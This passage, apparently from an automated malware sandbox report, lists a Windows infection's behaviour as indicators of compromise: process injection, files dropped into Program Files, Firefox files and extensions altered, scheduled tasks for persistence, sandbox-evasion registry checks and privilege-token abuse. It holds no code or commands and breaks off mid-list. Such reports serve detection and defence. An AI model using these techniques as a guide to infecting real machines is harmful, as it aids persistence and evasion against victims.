SN8pRGmvfIetO31nMREgZCBd.exeoMPcKCByxz6c6aQOVuge8D1R.exe4CBGCHM82DE58EB.exe5XX9Z8GfruEUHkqLJGNcaeDq.exeK94I82H7GA442K5.exeVQbpujdSGomqnbS9WjiyreEK.exeOaITYmj2fsq0x8aMFqNsCs4j.exe75huro8A6uIQ4Z3yLnBxmNPI.exeGosxYJzZkoJQOXo9mXaLnZ9Q.exenoX74RWvzcp4L6vaQgCqmGgG.exe5PzEorzxArsuyso_tUF64BQZ.exeVQbpujdSGomqnbS9WjiyreEK.exebuild2.exe18BA.exe1C37.exe18BA.exebuild2.exeRespect.exe.pifhudcvscdescription pid process target process PID 5740 set thread context of 5736 5740 SN8pRGmvfIetO31nMREgZCBd.exe SN8pRGmvfIetO31nMREgZCBd.exe PID 6064 set thread context of 5772 6064 oMPcKCByxz6c6aQOVuge8D1R.exe oMPcKCByxz6c6aQOVuge8D1R.exe PID 73724 set thread context of 4272 73724 4CBGCHM82DE58EB.exe 4CBGCHM82DE58EB.exe PID 6028 set thread context of 73644 6028 5XX9Z8GfruEUHkqLJGNcaeDq.exe AppLaunch.exe PID 73696 set thread context of 73588 73696 K94I82H7GA442K5.exe K94I82H7GA442K5.exe PID 5788 set thread context of 2140 5788 VQbpujdSGomqnbS9WjiyreEK.exe VQbpujdSGomqnbS9WjiyreEK.exe PID 6056 set thread context of 4504 6056 OaITYmj2fsq0x8aMFqNsCs4j.exe AppLaunch.exe PID 5800 set thread context of 59796 5800 75huro8A6uIQ4Z3yLnBxmNPI.exe RegAsm.exe PID 5968 set thread context of 59760 5968 GosxYJzZkoJQOXo9mXaLnZ9Q.exe AppLaunch.exe PID 51500 set thread context of 53336 51500 noX74RWvzcp4L6vaQgCqmGgG.exe vbc.exe PID 51472 set thread context of 71064 51472 5PzEorzxArsuyso_tUF64BQZ.exe 5PzEorzxArsuyso_tUF64BQZ.exe PID 70700 set thread context of 71616 70700 VQbpujdSGomqnbS9WjiyreEK.exe VQbpujdSGomqnbS9WjiyreEK.exe PID 5132 set thread context of 10572 5132 build2.exe build2.exe PID 25352 set thread context of 69456 25352 18BA.exe 18BA.exe PID 25384 set thread context of 69432 25384 1C37.exe AppLaunch.exe PID 69600 set thread context of 69644 69600 18BA.exe 18BA.exe PID 8252 set thread context of 12092 8252 build2.exe build2.exe PID 20368 set thread context of 12316 20368 Respect.exe.pif Respect.exe.pif PID 12884 set thread context of 13060 12884 hudcvsc hudcvsc -
Drops file in Program Files directory 18 IoCs
Processes:
oaLvSCW.exesetup.exe5dql7piSRHDDYa_r8buffZkT.exedescription ioc process File created C:\Program Files (x86)\sJGvZSUioXRU2\CqqAbtH.xml oaLvSCW.exe File created C:\Program Files (x86)\KYhAKHECtWIvC\UzemJmy.dll oaLvSCW.exe File created C:\Program Files (x86)\wrndFtifU\ADiKMh.dll oaLvSCW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja oaLvSCW.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak oaLvSCW.exe File created C:\Program Files (x86)\KYhAKHECtWIvC\OwrHoLH.xml oaLvSCW.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220916072533.pma setup.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi oaLvSCW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi oaLvSCW.exe File created C:\Program Files (x86)\BpmXCGkSTNUn\PEmlqZy.dll oaLvSCW.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 5dql7piSRHDDYa_r8buffZkT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak oaLvSCW.exe File created C:\Program Files (x86)\wrndFtifU\cUXIbIj.xml oaLvSCW.exe File created C:\Program Files (x86)\sJGvZSUioXRU2\rApDBiHKBMehj.dll oaLvSCW.exe File created C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\UyrwWnE.dll oaLvSCW.exe File created C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\cweDAZY.xml oaLvSCW.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\75f9ae9f-80e7-420a-ab20-cc5d674459e6.tmp setup.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 5dql7piSRHDDYa_r8buffZkT.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\hEOVRvlnWpJzMGvLw.job schtasks.exe File created C:\Windows\Tasks\CMIDffFQijmeSZd.job schtasks.exe File created C:\Windows\Tasks\tzhoEZPqxAOMgijXP.job schtasks.exe File created C:\Windows\Tasks\bfPiLOEoMHGtOUUyTU.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 56996 5764 WerFault.exe _TiaXZiUu6XgZbvoAZY2sRH0.exe 14820 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 60568 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 16424 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 53220 71640 WerFault.exe rundll32.exe 53476 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 60628 51484 WerFault.exe XqFLMvUeBEg_P943krgYtWkU.exe 70764 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 71144 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 71236 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 71468 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 71560 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 73568 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 16444 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 5824 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 3064 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 3964 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 4520 6012 WerFault.exe Dj7oV6pePcIXJQ2f96mvaT24.exe 3160 5716 WerFault.exe m7tpR8y__P6zIjNc638scLmV.exe 6424 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 9684 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 10432 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 10792 51464 WerFault.exe nvNlamGS3lVvMXNb9dzkJmr7.exe 13108 12732 WerFault.exe itdcvsc -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
uV50xbiY4LlMWsebJOoi_R_O.exe5PzEorzxArsuyso_tUF64BQZ.exe1AAF.exegtdcvscdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uV50xbiY4LlMWsebJOoi_R_O.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uV50xbiY4LlMWsebJOoi_R_O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5PzEorzxArsuyso_tUF64BQZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1AAF.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1AAF.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1AAF.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uV50xbiY4LlMWsebJOoi_R_O.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5PzEorzxArsuyso_tUF64BQZ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5PzEorzxArsuyso_tUF64BQZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gtdcvsc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gtdcvsc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gtdcvsc -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Dj7oV6pePcIXJQ2f96mvaT24.exeAppLaunch.exebuild2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Dj7oV6pePcIXJQ2f96mvaT24.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Dj7oV6pePcIXJQ2f96mvaT24.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AppLaunch.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AppLaunch.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 19860 schtasks.exe 20016 schtasks.exe 11856 schtasks.exe 12180 schtasks.exe 66408 schtasks.exe 12540 schtasks.exe 12584 schtasks.exe 12628 schtasks.exe 12676 schtasks.exe 12748 schtasks.exe 6220 schtasks.exe 72496 schtasks.exe 59848 schtasks.exe 11644 schtasks.exe 12412 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 10376 timeout.exe 17828 timeout.exe 19132 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 20204 tasklist.exe 20252 tasklist.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
msedge.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 9456 taskkill.exe 11368 taskkill.exe 17512 taskkill.exe 18992 taskkill.exe 70776 taskkill.exe 6548 taskkill.exe -
Processes:
368C0412AGB029I.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" 368C0412AGB029I.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch 368C0412AGB029I.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" 368C0412AGB029I.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync 368C0412AGB029I.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeoaLvSCW.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix oaLvSCW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" oaLvSCW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" oaLvSCW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket oaLvSCW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Modifies registry class 5 IoCs
Processes:
msedge.exeInstall.exeKJN4UTMVm4u4hm7saACgHkd5.exe0JE7G3LK557H5E8.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Install.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ KJN4UTMVm4u4hm7saACgHkd5.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings 0JE7G3LK557H5E8.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 281 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exeInstall.exemsedge.exeeHFS6NZuqQ_xO0mJVksaQreP.exennb09fHefcHKAg9TUhBoFZHP.exeuV50xbiY4LlMWsebJOoi_R_O.exen2bxaZuE24qU0suJTAECSlqq.exe4CBGCHM82DE58EB.exeybRTF_ZrBzghRmdqS2tL_QaU.exepid process 4980 msedge.exe 4980 msedge.exe 4880 msedge.exe 4880 msedge.exe 1072 identity_helper.exe 1072 identity_helper.exe 4092 msedge.exe 4092 msedge.exe 5276 Install.exe 5276 Install.exe 5276 Install.exe 5276 Install.exe 5276 Install.exe 5276 Install.exe 1576 msedge.exe 1576 msedge.exe 1576 msedge.exe 1576 msedge.exe 1576 msedge.exe 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe 6036 nnb09fHefcHKAg9TUhBoFZHP.exe 6036 nnb09fHefcHKAg9TUhBoFZHP.exe 5752 uV50xbiY4LlMWsebJOoi_R_O.exe 5752 uV50xbiY4LlMWsebJOoi_R_O.exe 380 n2bxaZuE24qU0suJTAECSlqq.exe 380 n2bxaZuE24qU0suJTAECSlqq.exe 4272 4CBGCHM82DE58EB.exe 4272 4CBGCHM82DE58EB.exe 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 59600 ybRTF_ZrBzghRmdqS2tL_QaU.exe 59600 ybRTF_ZrBzghRmdqS2tL_QaU.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Adblock.exepid process 2220 71628 Adblock.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
uV50xbiY4LlMWsebJOoi_R_O.exe5PzEorzxArsuyso_tUF64BQZ.exe1AAF.exegtdcvscpid process 5752 uV50xbiY4LlMWsebJOoi_R_O.exe 71064 5PzEorzxArsuyso_tUF64BQZ.exe 2220 2220 2220 2220 25368 1AAF.exe 12716 gtdcvsc -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
msedge.exepid process 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
oMPcKCByxz6c6aQOVuge8D1R.exeK94I82H7GA442K5.exen2bxaZuE24qU0suJTAECSlqq.exe4CBGCHM82DE58EB.exeeHFS6NZuqQ_xO0mJVksaQreP.exennb09fHefcHKAg9TUhBoFZHP.exe75huro8A6uIQ4Z3yLnBxmNPI.exerobocopy.exedescription pid process Token: SeDebugPrivilege 5772 oMPcKCByxz6c6aQOVuge8D1R.exe Token: SeDebugPrivilege 73588 K94I82H7GA442K5.exe Token: SeDebugPrivilege 380 n2bxaZuE24qU0suJTAECSlqq.exe Token: SeDebugPrivilege 4272 4CBGCHM82DE58EB.exe Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeDebugPrivilege 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeDebugPrivilege 6036 nnb09fHefcHKAg9TUhBoFZHP.exe Token: SeDebugPrivilege 5800 75huro8A6uIQ4Z3yLnBxmNPI.exe Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeBackupPrivilege 53416 robocopy.exe Token: SeRestorePrivilege 53416 robocopy.exe Token: SeSecurityPrivilege 53416 robocopy.exe Token: SeTakeOwnershipPrivilege 53416 robocopy.exe Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 Token: SeCreatePagefilePrivilege 2220 Token: SeShutdownPrivilege 2220 -
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
msedge.exe36tK0gCUVT2orDhALS0_tIKC.tmpAdblock.exeRespect.exe.pifpid process 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 4880 msedge.exe 53464 36tK0gCUVT2orDhALS0_tIKC.tmp 71628 Adblock.exe 2220 2220 20368 Respect.exe.pif 2220 2220 20368 Respect.exe.pif 20368 Respect.exe.pif 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 -
Suspicious use of SendNotifyMessage 31 IoCs
Processes:
Adblock.exeRespect.exe.pifpid process 71628 Adblock.exe 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 2220 20368 Respect.exe.pif 20368 Respect.exe.pif 20368 Respect.exe.pif -
Suspicious use of SetWindowsHookEx 52 IoCs
Processes:
